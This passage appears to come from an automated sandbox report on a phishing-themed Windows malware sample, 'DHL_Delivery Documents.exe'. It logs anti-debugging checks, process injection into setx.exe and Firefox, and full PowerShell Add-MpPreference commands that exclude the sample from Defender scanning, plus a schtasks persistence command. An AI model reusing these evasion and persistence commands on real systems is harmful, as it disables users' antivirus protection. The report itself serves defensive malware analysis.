            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h]8_2_01C30BCB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h]8_2_01C30BCB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h]8_2_01C30BCB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h]8_2_01C10BCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h]8_2_01C10BCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h]8_2_01C10BCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBEBD0 mov eax, dword ptr fs:[00000030h]8_2_01CBEBD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h]8_2_01C18BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h]8_2_01C18BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h]8_2_01C18BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C9CBF0 mov eax, dword ptr fs:[00000030h] | 8_2_01C9CBF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3EBFC mov eax, dword ptr fs:[00000030h] | 8_2_01C3EBFC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20BBE mov eax, dword ptr fs:[00000030h] | 8_2_01C20BBE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20BBE mov eax, dword ptr fs:[00000030h] | 8_2_01C20BBE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC4BB0 mov eax, dword ptr fs:[00000030h] | 8_2_01CC4BB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC4BB0 mov eax, dword ptr fs:[00000030h] | 8_2_01CC4BB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC4B4B mov eax, dword ptr fs:[00000030h] | 8_2_01CC4B4B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CC4B4B mov eax, dword ptr fs:[00000030h] | 8_2_01CC4B4B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CB8B42 mov eax, dword ptr fs:[00000030h] | 8_2_01CB8B42
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA6B40 mov eax, dword ptr fs:[00000030h] | 8_2_01CA6B40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CA6B40 mov eax, dword ptr fs:[00000030h] | 8_2_01CA6B40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CDAB40 mov eax, dword ptr fs:[00000030h] | 8_2_01CDAB40
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C08B50 mov eax, dword ptr fs:[00000030h] | 8_2_01C08B50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] | 8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] | 8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] | 8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE2B57 mov eax, dword ptr fs:[00000030h] | 8_2_01CE2B57
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CBEB50 mov eax, dword ptr fs:[00000030h] | 8_2_01CBEB50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C0CB7E mov eax, dword ptr fs:[00000030h] | 8_2_01C0CB7E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4B00 mov eax, dword ptr fs:[00000030h] | 8_2_01CE4B00
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C8EB1D mov eax, dword ptr fs:[00000030h] | 8_2_01C8EB1D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3EB20 mov eax, dword ptr fs:[00000030h] | 8_2_01C3EB20
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C3EB20 mov eax, dword ptr fs:[00000030h] | 8_2_01C3EB20
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CD8B28 mov eax, dword ptr fs:[00000030h] | 8_2_01CD8B28
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CD8B28 mov eax, dword ptr fs:[00000030h] | 8_2_01CD8B28
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h] | 8_2_01C66ACC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h] | 8_2_01C66ACC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C66ACC mov eax, dword ptr fs:[00000030h] | 8_2_01C66ACC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C10AD0 mov eax, dword ptr fs:[00000030h] | 8_2_01C10AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C44AD0 mov eax, dword ptr fs:[00000030h] | 8_2_01C44AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C44AD0 mov eax, dword ptr fs:[00000030h] | 8_2_01C44AD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4AAEE mov eax, dword ptr fs:[00000030h] | 8_2_01C4AAEE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4AAEE mov eax, dword ptr fs:[00000030h] | 8_2_01C4AAEE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C1EA80 mov eax, dword ptr fs:[00000030h] | 8_2_01C1EA80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01CE4A80 mov eax, dword ptr fs:[00000030h] | 8_2_01CE4A80
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C48A90 mov edx, dword ptr fs:[00000030h] | 8_2_01C48A90
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C18AA0 mov eax, dword ptr fs:[00000030h] | 8_2_01C18AA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C18AA0 mov eax, dword ptr fs:[00000030h] | 8_2_01C18AA0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C66AA4 mov eax, dword ptr fs:[00000030h] | 8_2_01C66AA4
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] | 8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] | 8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] | 8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] | 8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] | 8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] | 8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C16A50 mov eax, dword ptr fs:[00000030h] | 8_2_01C16A50
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20A5B mov eax, dword ptr fs:[00000030h] | 8_2_01C20A5B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C20A5B mov eax, dword ptr fs:[00000030h] | 8_2_01C20A5B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Code function: 8_2_01C4CA6F mov eax, dword ptr fs:[00000030h] | 8_2_01C4CA6F
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF48EC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtQueryAttributesFile: Direct from: 0x76EF2E6C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtQuerySystemInformation: Direct from: 0x76EF48CC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtOpenSection: Direct from: 0x76EF2E0C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtDeviceIoControlFile: Direct from: 0x76EF2AEC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtSetInformationThread: Direct from: 0x76EF2ECC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtQueryInformationToken: Direct from: 0x76EF2CAC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtCreateFile: Direct from: 0x76EF2FEC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtOpenFile: Direct from: 0x76EF2DCC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtOpenKeyEx: Direct from: 0x76EF2B9C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtSetInformationProcess: Direct from: 0x76EF2C5C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtProtectVirtualMemory: Direct from: 0x76EF2F9C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtWriteVirtualMemory: Direct from: 0x76EF2E3C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtNotifyChangeKey: Direct from: 0x76EF3C2C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtCreateMutant: Direct from: 0x76EF35CC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtResumeThread: Direct from: 0x76EF36AC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtMapViewOfSection: Direct from: 0x76EF2D1C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtProtectVirtualMemory: Direct from: 0x76EE7B2E
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtQuerySystemInformation: Direct from: 0x76EF2DFC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtReadFile: Direct from: 0x76EF2ADC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtDelayExecution: Direct from: 0x76EF2DDC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtQueryInformationProcess: Direct from: 0x76EF2C26
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtResumeThread: Direct from: 0x76EF2FBC
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtCreateUserProcess: Direct from: 0x76EF371C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtWriteVirtualMemory: Direct from: 0x76EF490C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtClose: Direct from: 0x76EF2B6C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtSetInformationThread: Direct from: 0x76EF2B4C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtReadVirtualMemory: Direct from: 0x76EF2E8C
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Section loaded: NULL target: C:\Windows\SysWOW64\setx.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: read write
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: NULL target: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\setx.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\setx.exe | Thread register set: target process: 8188
            Source: C:\Windows\SysWOW64\setx.exe | Thread APC queued: target process: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Process created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"
            Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe | Process created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
            Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe | Process created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe"
            Source: C:\Windows\SysWOW64\setx.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000000.2559247576.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279577421.00000000016B1000.00000002.00000001.00040000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3279717921.0000000000F01000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Queries volume information: C:\Users\user\Desktop\DHL_Delivery Documents.exe VolumeInformation
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
